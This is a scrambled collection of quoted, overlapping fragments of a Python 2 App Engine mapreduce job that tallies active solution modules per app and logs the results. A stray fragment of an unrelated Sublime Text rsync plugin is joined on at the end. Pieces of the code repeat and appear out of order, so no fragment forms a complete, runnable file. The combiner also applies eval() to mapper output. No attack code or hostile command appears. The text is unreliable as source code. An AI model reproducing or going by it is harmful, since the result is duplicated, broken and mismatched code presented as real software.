"}, 'combiner_spec': 'solutions.common.job.module_statistics.combiner', 'reducer_spec': 'solutions.common.job.module_statistics.reducer', 'reducer_params': { 'output_writer': { 'bucket_name': bucket_name } },",
"or implied. # See the License for the specific language governing permissions and",
"-> GeneratorType for service_identity in get_service_identities(sln_settings.service_user): yield service_identity.app_id, str(sln_settings.modules) def _combine(new_values, previous_combined_values): #",
"combined[module] += count for v in new_values: # mapper returns a string modules",
"'combiner_spec': 'solutions.common.job.module_statistics.combiner', 'reducer_spec': 'solutions.common.job.module_statistics.reducer', 'reducer_params': { 'output_writer': { 'bucket_name': bucket_name } }, 'input_reader_spec':",
"key = 'module_stats_%s_%s' % (current_date.strftime('%Y-%m-%d'), guid()) counter = ModuleStatsPipeline(PIPELINE_BUCKET, key, time.mktime(current_date.timetuple())) task =",
"# type: (str, list[list[str]], list[dict[str, int]]) -> GeneratorType if DEBUG: logging.debug('combiner %s new_values:",
"Apache License, Version 2.0 (the \"License\"); # you may not use this file",
"app_id, 'stats': combined}) if DEBUG: logging.debug('reducer %s: %s', app_id, json_line) yield '%s\\n' %",
"OR CONDITIONS OF ANY KIND, either express or implied. # See the License",
"may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # #",
"json.dumps({'app_id': app_id, 'stats': combined}) if DEBUG: logging.debug('reducer %s: %s', app_id, json_line) yield '%s\\n'",
"output, current_date): results = [] for filename in output: results.append((yield ProcessFilePipeline(filename))) yield List(*results)",
"with cloudstorage.open(filename, \"r\") as f: for json_line in f: d = json.loads(json_line) stats_per_app[d['app_id']]",
"rogerthat.settings import get_server_settings from rogerthat.utils import guid, log_offload def start_job(): current_date = datetime.datetime.now()",
"http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing,",
"in writing, software # distributed under the License is distributed on an \"AS",
"yield combined def reducer(app_id, values): # type: (str, list[dict[str, int]]) -> GeneratorType if",
"if DEBUG: logging.debug('reducer %s: %s', app_id, json_line) yield '%s\\n' % json_line class ModuleStatsPipeline(pipeline.Pipeline):",
"in previous_combined_values: for module, count in stats.iteritems(): if module not in combined: combined[module]",
"logging.debug('reducer %s: %s', app_id, json_line) yield '%s\\n' % json_line class ModuleStatsPipeline(pipeline.Pipeline): def run(self,",
"bucket_name } }, 'input_reader_spec': 'mapreduce.input_readers.DatastoreInputReader', 'output_writer_spec': 'mapreduce.output_writers.GoogleCloudStorageConsistentOutputWriter', 'shards': 2 if DEBUG else 10",
"combined[module] += 1 return combined def combiner(key, new_values, previously_combined_values): # type: (str, list[list[str]],",
"# See the License for the specific language governing permissions and # limitations",
"the License is distributed on an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR",
"current_date = datetime.datetime.now() key = 'module_stats_%s_%s' % (current_date.strftime('%Y-%m-%d'), guid()) counter = ModuleStatsPipeline(PIPELINE_BUCKET, key,",
"counter.start(idempotence_key=key, return_task=True) task.add(queue_name=STATS_QUEUE) redirect_url = '%s/status?root=%s' % (counter.base_path, counter.pipeline_id) logging.info('ModuleStats pipeline url: %s',",
"% (current_date.strftime('%Y-%m-%d'), guid()) counter = ModuleStatsPipeline(PIPELINE_BUCKET, key, time.mktime(current_date.timetuple())) task = counter.start(idempotence_key=key, return_task=True) task.add(queue_name=STATS_QUEUE)",
"bucket_name, 'entity_kind': 'solutions.common.models.SolutionSettings', 'filters': [] }, 'combiner_spec': 'solutions.common.job.module_statistics.combiner', 'reducer_spec': 'solutions.common.job.module_statistics.reducer', 'reducer_params': { 'output_writer':",
"import mapreduce_pipeline from pipeline import pipeline from pipeline.common import List from rogerthat.consts import",
"from mapreduce import mapreduce_pipeline from pipeline import pipeline from pipeline.common import List from",
"app_id, value dict of module, amount outputs = self.outputs.default.value # type: list[dict[int, int]]",
"log_offload def start_job(): current_date = datetime.datetime.now() key = 'module_stats_%s_%s' % (current_date.strftime('%Y-%m-%d'), guid()) counter",
"stats in previous_combined_values: for module, count in stats.iteritems(): if module not in combined:",
"isinstance(v, basestring) else v for module in modules: if module not in combined:",
"values): # type: (str, list[dict[str, int]]) -> GeneratorType if DEBUG: logging.info('reducer values: %s',",
"mapper returns a string modules = eval(v) if isinstance(v, basestring) else v for",
"was aborted', self, _suppress=False) return logging.info('%s was finished', self) class ProcessOutputPipeline(pipeline.Pipeline): def run(self,",
"# limitations under the License. # # @@license_version:1.7@@ import datetime import json import",
"if module not in combined: combined[module] = count else: combined[module] += count for",
"[] }, 'combiner_spec': 'solutions.common.job.module_statistics.combiner', 'reducer_spec': 'solutions.common.job.module_statistics.reducer', 'reducer_params': { 'output_writer': { 'bucket_name': bucket_name }",
"cloudstorage from mapreduce import mapreduce_pipeline from pipeline import pipeline from pipeline.common import List",
"json_line in f: d = json.loads(json_line) stats_per_app[d['app_id']] = d['stats'] if DEBUG: logging.debug('ProcessFilePipeline: %s',",
"the Apache License, Version 2.0 (the \"License\"); # you may not use this",
"pipeline url: %s', redirect_url) return get_server_settings().baseUrl + redirect_url def mapper(sln_settings): # type: (SolutionSettings)",
"list[dict[int, int]] for output in outputs: log_offload.create_log(None, 'oca.active_modules', output, None, timestamp=timestamp) class ProcessFilePipeline(pipeline.Pipeline):",
"you may not use this file except in compliance with the License. #",
"previous_combined_values): # type: (list[list[str]], list[dict[str, int]]) -> dict[str, int] combined = {} for",
"%s', values) combined = _combine([], values) json_line = json.dumps({'app_id': app_id, 'stats': combined}) if",
"Green Valley Belgium NV # # Licensed under the Apache License, Version 2.0",
"v in new_values: # mapper returns a string modules = eval(v) if isinstance(v,",
"return logging.info('%s was finished', self) class ProcessOutputPipeline(pipeline.Pipeline): def run(self, output, current_date): results =",
"'oca.active_modules', output, None, timestamp=timestamp) class ProcessFilePipeline(pipeline.Pipeline): def run(self, filename): stats_per_app = {} with",
"combined def combiner(key, new_values, previously_combined_values): # type: (str, list[list[str]], list[dict[str, int]]) -> GeneratorType",
"specific language governing permissions and # limitations under the License. # # @@license_version:1.7@@",
"under the License. # # @@license_version:1.7@@ import datetime import json import logging import",
"mapreduce import mapreduce_pipeline from pipeline import pipeline from pipeline.common import List from rogerthat.consts",
"mapreduce_pipeline.MapreducePipeline(key, **params) process_output_pipeline = yield ProcessOutputPipeline(output, current_date) with pipeline.After(process_output_pipeline): yield CleanupGoogleCloudStorageFiles(output) def finalized(self):",
"json_line class ModuleStatsPipeline(pipeline.Pipeline): def run(self, bucket_name, key, current_date): # type: (str, str, long)",
"long) -> GeneratorType params = { 'mapper_spec': 'solutions.common.job.module_statistics.mapper', 'mapper_params': { 'bucket_name': bucket_name, 'entity_kind':",
"use this file except in compliance with the License. # You may obtain",
"in combined: combined[module] = count else: combined[module] += count for v in new_values:",
"values) combined = _combine([], values) json_line = json.dumps({'app_id': app_id, 'stats': combined}) if DEBUG:",
"= '%s/status?root=%s' % (counter.base_path, counter.pipeline_id) logging.info('ModuleStats pipeline url: %s', redirect_url) return get_server_settings().baseUrl +",
"# type: list[dict[int, int]] for output in outputs: log_offload.create_log(None, 'oca.active_modules', output, None, timestamp=timestamp)",
"with pipeline.After(process_output_pipeline): yield CleanupGoogleCloudStorageFiles(output) def finalized(self): if self.was_aborted: logging.error('%s was aborted', self, _suppress=False)",
"= 'module_stats_%s_%s' % (current_date.strftime('%Y-%m-%d'), guid()) counter = ModuleStatsPipeline(PIPELINE_BUCKET, key, time.mktime(current_date.timetuple())) task = counter.start(idempotence_key=key,",
"2 if DEBUG else 10 } output = yield mapreduce_pipeline.MapreducePipeline(key, **params) process_output_pipeline =",
"= datetime.datetime.now() key = 'module_stats_%s_%s' % (current_date.strftime('%Y-%m-%d'), guid()) counter = ModuleStatsPipeline(PIPELINE_BUCKET, key, time.mktime(current_date.timetuple()))",
"# mapper returns a string modules = eval(v) if isinstance(v, basestring) else v",
"ProcessOutputPipeline(output, current_date) with pipeline.After(process_output_pipeline): yield CleanupGoogleCloudStorageFiles(output) def finalized(self): if self.was_aborted: logging.error('%s was aborted',",
"= _combine([], values) json_line = json.dumps({'app_id': app_id, 'stats': combined}) if DEBUG: logging.debug('reducer %s:",
"# Licensed under the Apache License, Version 2.0 (the \"License\"); # you may",
"guid, log_offload def start_job(): current_date = datetime.datetime.now() key = 'module_stats_%s_%s' % (current_date.strftime('%Y-%m-%d'), guid())",
"class ProcessFilePipeline(pipeline.Pipeline): def run(self, filename): stats_per_app = {} with cloudstorage.open(filename, \"r\") as f:",
"output: results.append((yield ProcessFilePipeline(filename))) yield List(*results) def finalized(self): if DEBUG: logging.debug('ProcessOutputPipeline: self.outputs.default.value = %s',",
"Valley Belgium NV # # Licensed under the Apache License, Version 2.0 (the",
"in outputs: log_offload.create_log(None, 'oca.active_modules', output, None, timestamp=timestamp) class ProcessFilePipeline(pipeline.Pipeline): def run(self, filename): stats_per_app",
"self.was_aborted: logging.error('%s was aborted', self, _suppress=False) return logging.info('%s was finished', self) class ProcessOutputPipeline(pipeline.Pipeline):",
"combined = _combine([], values) json_line = json.dumps({'app_id': app_id, 'stats': combined}) if DEBUG: logging.debug('reducer",
"for stats in previous_combined_values: for module, count in stats.iteritems(): if module not in",
"run(self, output, current_date): results = [] for filename in output: results.append((yield ProcessFilePipeline(filename))) yield",
"key, new_values) logging.debug('combiner %s previously_combined_values: %s', key, previously_combined_values) combined = _combine(new_values, previously_combined_values) if",
"'bucket_name': bucket_name, 'entity_kind': 'solutions.common.models.SolutionSettings', 'filters': [] }, 'combiner_spec': 'solutions.common.job.module_statistics.combiner', 'reducer_spec': 'solutions.common.job.module_statistics.reducer', 'reducer_params': {",
"'reducer_spec': 'solutions.common.job.module_statistics.reducer', 'reducer_params': { 'output_writer': { 'bucket_name': bucket_name } }, 'input_reader_spec': 'mapreduce.input_readers.DatastoreInputReader', 'output_writer_spec':",
"not in combined: combined[module] = 1 else: combined[module] += 1 return combined def",
"else 10 } output = yield mapreduce_pipeline.MapreducePipeline(key, **params) process_output_pipeline = yield ProcessOutputPipeline(output, current_date)",
"2.0 (the \"License\"); # you may not use this file except in compliance",
"1 else: combined[module] += 1 return combined def combiner(key, new_values, previously_combined_values): # type:",
"modules: if module not in combined: combined[module] = 1 else: combined[module] += 1",
"if DEBUG: logging.info('reducer values: %s', values) combined = _combine([], values) json_line = json.dumps({'app_id':",
"list[list[str]], list[dict[str, int]]) -> GeneratorType if DEBUG: logging.debug('combiner %s new_values: %s', key, new_values)",
"for the specific language governing permissions and # limitations under the License. #",
"GeneratorType params = { 'mapper_spec': 'solutions.common.job.module_statistics.mapper', 'mapper_params': { 'bucket_name': bucket_name, 'entity_kind': 'solutions.common.models.SolutionSettings', 'filters':",
"ProcessOutputPipeline(pipeline.Pipeline): def run(self, output, current_date): results = [] for filename in output: results.append((yield",
"type: list[dict[int, int]] for output in outputs: log_offload.create_log(None, 'oca.active_modules', output, None, timestamp=timestamp) class",
"%s previously_combined_values: %s', key, previously_combined_values) combined = _combine(new_values, previously_combined_values) if DEBUG: logging.debug('combiner %s",
"WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the",
"get_service_identities from rogerthat.settings import get_server_settings from rogerthat.utils import guid, log_offload def start_job(): current_date",
"_combine(new_values, previous_combined_values): # type: (list[list[str]], list[dict[str, int]]) -> dict[str, int] combined = {}",
"# # Unless required by applicable law or agreed to in writing, software",
"json_line = json.dumps({'app_id': app_id, 'stats': combined}) if DEBUG: logging.debug('reducer %s: %s', app_id, json_line)",
"dict of module, amount outputs = self.outputs.default.value # type: list[dict[int, int]] for output",
"express or implied. # See the License for the specific language governing permissions",
"with key app_id, value dict of module, amount outputs = self.outputs.default.value # type:",
"type: (str, list[list[str]], list[dict[str, int]]) -> GeneratorType if DEBUG: logging.debug('combiner %s new_values: %s',",
"_, timestamp = self.args # list of dicts with key app_id, value dict",
"new_values: # mapper returns a string modules = eval(v) if isinstance(v, basestring) else",
"DEBUG: logging.info('reducer values: %s', values) combined = _combine([], values) json_line = json.dumps({'app_id': app_id,",
"either express or implied. # See the License for the specific language governing",
"timestamp=timestamp) class ProcessFilePipeline(pipeline.Pipeline): def run(self, filename): stats_per_app = {} with cloudstorage.open(filename, \"r\") as",
"self.outputs.default.value) _, timestamp = self.args # list of dicts with key app_id, value",
"'input_reader_spec': 'mapreduce.input_readers.DatastoreInputReader', 'output_writer_spec': 'mapreduce.output_writers.GoogleCloudStorageConsistentOutputWriter', 'shards': 2 if DEBUG else 10 } output =",
"logging.debug('combiner %s new_values: %s', key, new_values) logging.debug('combiner %s previously_combined_values: %s', key, previously_combined_values) combined",
"Licensed under the Apache License, Version 2.0 (the \"License\"); # you may not",
"an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either",
"new_values: %s', key, new_values) logging.debug('combiner %s previously_combined_values: %s', key, previously_combined_values) combined = _combine(new_values,",
"for module, count in stats.iteritems(): if module not in combined: combined[module] = count",
"\"r\") as f: for json_line in f: d = json.loads(json_line) stats_per_app[d['app_id']] = d['stats']",
"current_date) with pipeline.After(process_output_pipeline): yield CleanupGoogleCloudStorageFiles(output) def finalized(self): if self.was_aborted: logging.error('%s was aborted', self,",
"run(self, filename): stats_per_app = {} with cloudstorage.open(filename, \"r\") as f: for json_line in",
"d = json.loads(json_line) stats_per_app[d['app_id']] = d['stats'] if DEBUG: logging.debug('ProcessFilePipeline: %s', stats_per_app) return stats_per_app",
"{ 'output_writer': { 'bucket_name': bucket_name } }, 'input_reader_spec': 'mapreduce.input_readers.DatastoreInputReader', 'output_writer_spec': 'mapreduce.output_writers.GoogleCloudStorageConsistentOutputWriter', 'shards': 2",
"output = yield mapreduce_pipeline.MapreducePipeline(key, **params) process_output_pipeline = yield ProcessOutputPipeline(output, current_date) with pipeline.After(process_output_pipeline): yield",
"the License. # You may obtain a copy of the License at #",
"# -*- coding: utf-8 -*- # Copyright 2020 Green Valley Belgium NV #",
"v for module in modules: if module not in combined: combined[module] = 1",
"# distributed under the License is distributed on an \"AS IS\" BASIS, #",
"combined: combined[module] = count else: combined[module] += count for v in new_values: #",
"def finalized(self): if DEBUG: logging.debug('ProcessOutputPipeline: self.outputs.default.value = %s', self.outputs.default.value) _, timestamp = self.args",
"is distributed on an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF",
"def run(self, filename): stats_per_app = {} with cloudstorage.open(filename, \"r\") as f: for json_line",
"= %s', self.outputs.default.value) _, timestamp = self.args # list of dicts with key",
"# Copyright 2020 Green Valley Belgium NV # # Licensed under the Apache",
"key, combined) yield combined def reducer(app_id, values): # type: (str, list[dict[str, int]]) ->",
"'reducer_params': { 'output_writer': { 'bucket_name': bucket_name } }, 'input_reader_spec': 'mapreduce.input_readers.DatastoreInputReader', 'output_writer_spec': 'mapreduce.output_writers.GoogleCloudStorageConsistentOutputWriter', 'shards':",
"f: d = json.loads(json_line) stats_per_app[d['app_id']] = d['stats'] if DEBUG: logging.debug('ProcessFilePipeline: %s', stats_per_app) return",
"int]] for output in outputs: log_offload.create_log(None, 'oca.active_modules', output, None, timestamp=timestamp) class ProcessFilePipeline(pipeline.Pipeline): def",
"counter = ModuleStatsPipeline(PIPELINE_BUCKET, key, time.mktime(current_date.timetuple())) task = counter.start(idempotence_key=key, return_task=True) task.add(queue_name=STATS_QUEUE) redirect_url = '%s/status?root=%s'",
"'solutions.common.job.module_statistics.combiner', 'reducer_spec': 'solutions.common.job.module_statistics.reducer', 'reducer_params': { 'output_writer': { 'bucket_name': bucket_name } }, 'input_reader_spec': 'mapreduce.input_readers.DatastoreInputReader',",
"params = { 'mapper_spec': 'solutions.common.job.module_statistics.mapper', 'mapper_params': { 'bucket_name': bucket_name, 'entity_kind': 'solutions.common.models.SolutionSettings', 'filters': []",
"(counter.base_path, counter.pipeline_id) logging.info('ModuleStats pipeline url: %s', redirect_url) return get_server_settings().baseUrl + redirect_url def mapper(sln_settings):",
"for filename in output: results.append((yield ProcessFilePipeline(filename))) yield List(*results) def finalized(self): if DEBUG: logging.debug('ProcessOutputPipeline:",
"was finished', self) class ProcessOutputPipeline(pipeline.Pipeline): def run(self, output, current_date): results = [] for",
"module in modules: if module not in combined: combined[module] = 1 else: combined[module]",
"with the License. # You may obtain a copy of the License at",
"stats.iteritems(): if module not in combined: combined[module] = count else: combined[module] += count",
"'mapper_params': { 'bucket_name': bucket_name, 'entity_kind': 'solutions.common.models.SolutionSettings', 'filters': [] }, 'combiner_spec': 'solutions.common.job.module_statistics.combiner', 'reducer_spec': 'solutions.common.job.module_statistics.reducer',",
"GeneratorType if DEBUG: logging.info('reducer values: %s', values) combined = _combine([], values) json_line =",
"logging.debug('ProcessOutputPipeline: self.outputs.default.value = %s', self.outputs.default.value) _, timestamp = self.args # list of dicts",
"of module, amount outputs = self.outputs.default.value # type: list[dict[int, int]] for output in",
"if DEBUG else 10 } output = yield mapreduce_pipeline.MapreducePipeline(key, **params) process_output_pipeline = yield",
"# # Licensed under the Apache License, Version 2.0 (the \"License\"); # you",
"_combine([], values) json_line = json.dumps({'app_id': app_id, 'stats': combined}) if DEBUG: logging.debug('reducer %s: %s',",
"combined: %s', key, combined) yield combined def reducer(app_id, values): # type: (str, list[dict[str,",
"def _combine(new_values, previous_combined_values): # type: (list[list[str]], list[dict[str, int]]) -> dict[str, int] combined =",
"DEBUG else 10 } output = yield mapreduce_pipeline.MapreducePipeline(key, **params) process_output_pipeline = yield ProcessOutputPipeline(output,",
"law or agreed to in writing, software # distributed under the License is",
"str, long) -> GeneratorType params = { 'mapper_spec': 'solutions.common.job.module_statistics.mapper', 'mapper_params': { 'bucket_name': bucket_name,",
"the License for the specific language governing permissions and # limitations under the",
"+ redirect_url def mapper(sln_settings): # type: (SolutionSettings) -> GeneratorType for service_identity in get_service_identities(sln_settings.service_user):",
"import json import logging import time import cloudstorage from mapreduce import mapreduce_pipeline from",
"= eval(v) if isinstance(v, basestring) else v for module in modules: if module",
"on an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,",
"redirect_url = '%s/status?root=%s' % (counter.base_path, counter.pipeline_id) logging.info('ModuleStats pipeline url: %s', redirect_url) return get_server_settings().baseUrl",
"def combiner(key, new_values, previously_combined_values): # type: (str, list[list[str]], list[dict[str, int]]) -> GeneratorType if",
"# type: (SolutionSettings) -> GeneratorType for service_identity in get_service_identities(sln_settings.service_user): yield service_identity.app_id, str(sln_settings.modules) def",
"None, timestamp=timestamp) class ProcessFilePipeline(pipeline.Pipeline): def run(self, filename): stats_per_app = {} with cloudstorage.open(filename, \"r\")",
"yield mapreduce_pipeline.MapreducePipeline(key, **params) process_output_pipeline = yield ProcessOutputPipeline(output, current_date) with pipeline.After(process_output_pipeline): yield CleanupGoogleCloudStorageFiles(output) def",
"if DEBUG: logging.debug('combiner %s new_values: %s', key, new_values) logging.debug('combiner %s previously_combined_values: %s', key,",
"rogerthat.utils import guid, log_offload def start_job(): current_date = datetime.datetime.now() key = 'module_stats_%s_%s' %",
"previous_combined_values: for module, count in stats.iteritems(): if module not in combined: combined[module] =",
"yield ProcessOutputPipeline(output, current_date) with pipeline.After(process_output_pipeline): yield CleanupGoogleCloudStorageFiles(output) def finalized(self): if self.was_aborted: logging.error('%s was",
"self.outputs.default.value = %s', self.outputs.default.value) _, timestamp = self.args # list of dicts with",
"in f: d = json.loads(json_line) stats_per_app[d['app_id']] = d['stats'] if DEBUG: logging.debug('ProcessFilePipeline: %s', stats_per_app)",
"cloudstorage.open(filename, \"r\") as f: for json_line in f: d = json.loads(json_line) stats_per_app[d['app_id']] =",
"combined) yield combined def reducer(app_id, values): # type: (str, list[dict[str, int]]) -> GeneratorType",
"in compliance with the License. # You may obtain a copy of the",
"= { 'mapper_spec': 'solutions.common.job.module_statistics.mapper', 'mapper_params': { 'bucket_name': bucket_name, 'entity_kind': 'solutions.common.models.SolutionSettings', 'filters': [] },",
"License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or",
"'mapreduce.output_writers.GoogleCloudStorageConsistentOutputWriter', 'shards': 2 if DEBUG else 10 } output = yield mapreduce_pipeline.MapreducePipeline(key, **params)",
"# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. #",
"import get_service_identities from rogerthat.settings import get_server_settings from rogerthat.utils import guid, log_offload def start_job():",
"'stats': combined}) if DEBUG: logging.debug('reducer %s: %s', app_id, json_line) yield '%s\\n' % json_line",
"at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed",
"DEBUG: logging.debug('combiner %s new_values: %s', key, new_values) logging.debug('combiner %s previously_combined_values: %s', key, previously_combined_values)",
"(str, str, long) -> GeneratorType params = { 'mapper_spec': 'solutions.common.job.module_statistics.mapper', 'mapper_params': { 'bucket_name':",
"See the License for the specific language governing permissions and # limitations under",
"BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.",
"permissions and # limitations under the License. # # @@license_version:1.7@@ import datetime import",
"if isinstance(v, basestring) else v for module in modules: if module not in",
"'solutions.common.job.module_statistics.mapper', 'mapper_params': { 'bucket_name': bucket_name, 'entity_kind': 'solutions.common.models.SolutionSettings', 'filters': [] }, 'combiner_spec': 'solutions.common.job.module_statistics.combiner', 'reducer_spec':",
"a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required",
"PIPELINE_BUCKET from rogerthat.dal.service import get_service_identities from rogerthat.settings import get_server_settings from rogerthat.utils import guid,",
"def reducer(app_id, values): # type: (str, list[dict[str, int]]) -> GeneratorType if DEBUG: logging.info('reducer",
"# http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in",
"values) json_line = json.dumps({'app_id': app_id, 'stats': combined}) if DEBUG: logging.debug('reducer %s: %s', app_id,",
"yield List(*results) def finalized(self): if DEBUG: logging.debug('ProcessOutputPipeline: self.outputs.default.value = %s', self.outputs.default.value) _, timestamp",
"(list[list[str]], list[dict[str, int]]) -> dict[str, int] combined = {} for stats in previous_combined_values:",
"datetime import json import logging import time import cloudstorage from mapreduce import mapreduce_pipeline",
"else: combined[module] += count for v in new_values: # mapper returns a string",
"module not in combined: combined[module] = count else: combined[module] += count for v",
"key, time.mktime(current_date.timetuple())) task = counter.start(idempotence_key=key, return_task=True) task.add(queue_name=STATS_QUEUE) redirect_url = '%s/status?root=%s' % (counter.base_path, counter.pipeline_id)",
"new_values) logging.debug('combiner %s previously_combined_values: %s', key, previously_combined_values) combined = _combine(new_values, previously_combined_values) if DEBUG:",
"key app_id, value dict of module, amount outputs = self.outputs.default.value # type: list[dict[int,",
"logging.debug('combiner %s previously_combined_values: %s', key, previously_combined_values) combined = _combine(new_values, previously_combined_values) if DEBUG: logging.debug('combiner",
"combined: combined[module] = 1 else: combined[module] += 1 return combined def combiner(key, new_values,",
"outputs: log_offload.create_log(None, 'oca.active_modules', output, None, timestamp=timestamp) class ProcessFilePipeline(pipeline.Pipeline): def run(self, filename): stats_per_app =",
"previously_combined_values): # type: (str, list[list[str]], list[dict[str, int]]) -> GeneratorType if DEBUG: logging.debug('combiner %s",
"= self.args # list of dicts with key app_id, value dict of module,",
"'output_writer': { 'bucket_name': bucket_name } }, 'input_reader_spec': 'mapreduce.input_readers.DatastoreInputReader', 'output_writer_spec': 'mapreduce.output_writers.GoogleCloudStorageConsistentOutputWriter', 'shards': 2 if",
"{} for stats in previous_combined_values: for module, count in stats.iteritems(): if module not",
"Version 2.0 (the \"License\"); # you may not use this file except in",
"except in compliance with the License. # You may obtain a copy of",
"%s', key, new_values) logging.debug('combiner %s previously_combined_values: %s', key, previously_combined_values) combined = _combine(new_values, previously_combined_values)",
"redirect_url) return get_server_settings().baseUrl + redirect_url def mapper(sln_settings): # type: (SolutionSettings) -> GeneratorType for",
"results = [] for filename in output: results.append((yield ProcessFilePipeline(filename))) yield List(*results) def finalized(self):",
"# type: (str, str, long) -> GeneratorType params = { 'mapper_spec': 'solutions.common.job.module_statistics.mapper', 'mapper_params':",
"mapreduce_pipeline from pipeline import pipeline from pipeline.common import List from rogerthat.consts import STATS_QUEUE,",
"= {} for stats in previous_combined_values: for module, count in stats.iteritems(): if module",
"# You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0",
"may not use this file except in compliance with the License. # You",
"License is distributed on an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS",
"governing permissions and # limitations under the License. # # @@license_version:1.7@@ import datetime",
"mapper(sln_settings): # type: (SolutionSettings) -> GeneratorType for service_identity in get_service_identities(sln_settings.service_user): yield service_identity.app_id, str(sln_settings.modules)",
"%s combined: %s', key, combined) yield combined def reducer(app_id, values): # type: (str,",
"-*- # Copyright 2020 Green Valley Belgium NV # # Licensed under the",
"rogerthat.dal.service import get_service_identities from rogerthat.settings import get_server_settings from rogerthat.utils import guid, log_offload def",
"list[dict[str, int]]) -> GeneratorType if DEBUG: logging.debug('combiner %s new_values: %s', key, new_values) logging.debug('combiner",
"count else: combined[module] += count for v in new_values: # mapper returns a",
"} }, 'input_reader_spec': 'mapreduce.input_readers.DatastoreInputReader', 'output_writer_spec': 'mapreduce.output_writers.GoogleCloudStorageConsistentOutputWriter', 'shards': 2 if DEBUG else 10 }",
"combined = {} for stats in previous_combined_values: for module, count in stats.iteritems(): if",
"the specific language governing permissions and # limitations under the License. # #",
"def start_job(): current_date = datetime.datetime.now() key = 'module_stats_%s_%s' % (current_date.strftime('%Y-%m-%d'), guid()) counter =",
"in modules: if module not in combined: combined[module] = 1 else: combined[module] +=",
"time import cloudstorage from mapreduce import mapreduce_pipeline from pipeline import pipeline from pipeline.common",
"'bucket_name': bucket_name } }, 'input_reader_spec': 'mapreduce.input_readers.DatastoreInputReader', 'output_writer_spec': 'mapreduce.output_writers.GoogleCloudStorageConsistentOutputWriter', 'shards': 2 if DEBUG else",
"if DEBUG: logging.debug('ProcessFilePipeline: %s', stats_per_app) return stats_per_app class CleanupGoogleCloudStorageFiles(pipeline.Pipeline): def run(self, output): for",
"NV # # Licensed under the Apache License, Version 2.0 (the \"License\"); #",
"in get_service_identities(sln_settings.service_user): yield service_identity.app_id, str(sln_settings.modules) def _combine(new_values, previous_combined_values): # type: (list[list[str]], list[dict[str, int]])",
"= ModuleStatsPipeline(PIPELINE_BUCKET, key, time.mktime(current_date.timetuple())) task = counter.start(idempotence_key=key, return_task=True) task.add(queue_name=STATS_QUEUE) redirect_url = '%s/status?root=%s' %",
"%s', app_id, json_line) yield '%s\\n' % json_line class ModuleStatsPipeline(pipeline.Pipeline): def run(self, bucket_name, key,",
"combined = _combine(new_values, previously_combined_values) if DEBUG: logging.debug('combiner %s combined: %s', key, combined) yield",
"self.outputs.default.value # type: list[dict[int, int]] for output in outputs: log_offload.create_log(None, 'oca.active_modules', output, None,",
"DEBUG: logging.debug('ProcessFilePipeline: %s', stats_per_app) return stats_per_app class CleanupGoogleCloudStorageFiles(pipeline.Pipeline): def run(self, output): for filename",
"string modules = eval(v) if isinstance(v, basestring) else v for module in modules:",
"distributed under the License is distributed on an \"AS IS\" BASIS, # WITHOUT",
"dict[str, int] combined = {} for stats in previous_combined_values: for module, count in",
"class ProcessOutputPipeline(pipeline.Pipeline): def run(self, output, current_date): results = [] for filename in output:",
"json.loads(json_line) stats_per_app[d['app_id']] = d['stats'] if DEBUG: logging.debug('ProcessFilePipeline: %s', stats_per_app) return stats_per_app class CleanupGoogleCloudStorageFiles(pipeline.Pipeline):",
"import guid, log_offload def start_job(): current_date = datetime.datetime.now() key = 'module_stats_%s_%s' % (current_date.strftime('%Y-%m-%d'),",
"%s', key, previously_combined_values) combined = _combine(new_values, previously_combined_values) if DEBUG: logging.debug('combiner %s combined: %s',",
"combined[module] = 1 else: combined[module] += 1 return combined def combiner(key, new_values, previously_combined_values):",
"'filters': [] }, 'combiner_spec': 'solutions.common.job.module_statistics.combiner', 'reducer_spec': 'solutions.common.job.module_statistics.reducer', 'reducer_params': { 'output_writer': { 'bucket_name': bucket_name"
"False elif len(more) == 2: host = more[1] else: host = more[0] if",
"sublime_api import remote.sync_api as sync_api import remote.vagrant_api as vagrant_api # ============================================================================= class RsyncOptionsCommand(sublime_plugin.TextCommand):",
"\" entered\") return False elif len(more) == 2: host = more[1] else: host",
"paths): sublime.set_timeout_async(lambda: from_remote_async(paths[0]), 0) def from_remote_async(path): print(\"From local path\", path) w = sublime.active_window()",
"settings) if callback is not None: callback(settings) remotePath = \"\" found = sublime_api.project_by_path(w,",
"\"\"\"This module implements the Sublime Text 3 commands provided by remote.\"\"\" import os",
"= sublime.active_window() found = sublime_api.project_by_path(w, filename) if found is None: return False return",
"return True parts = userInput.split(\":\") if len(parts) != 2: sublime_api.error_message(\"The remote path you",
"found[\"remotePath\"] sublime_api.show_input_panel(\"Sync this folder to remote folder:\", remotePath, done_with_folder, None, None) # =============================================================================",
"vms, 2) else: sublime_api.show_quick_panel(vms, lambda i=-1: done_with_vm(userInput, vms, i)) else: do_it(userInput, \"\") return",
"= \"\" if len(more) > 2: sublime_api.error_message(\"Unable to parse the remote path you\"",
"0) def to_remote_async(path): print(\"To local path\", path) w = sublime.active_window() found = sublime_api.project_by_path(w,",
"def run(self, edit, paths): sublime.set_timeout_async(lambda: from_remote_async(paths[0]), 0) def from_remote_async(path): print(\"From local path\", path)",
"print(\"To local path\", path) w = sublime.active_window() found = sublime_api.project_by_path(w, path) if found",
"entered does not\" + \" appear to contain a host\") return False more",
"\"\": options = found[\"rsyncOptions\"] sublime_api.show_input_panel(\"Use these rsync options:\", options, done_with_options, None, None) #",
"> 2: sublime_api.error_message(\"Unable to parse the remote path you\" + \" entered\") return",
"\"\" if len(more) > 2: sublime_api.error_message(\"Unable to parse the remote path you\" +",
"do_it(\"\", \"\") return True parts = userInput.split(\":\") if len(parts) != 2: sublime_api.error_message(\"The remote",
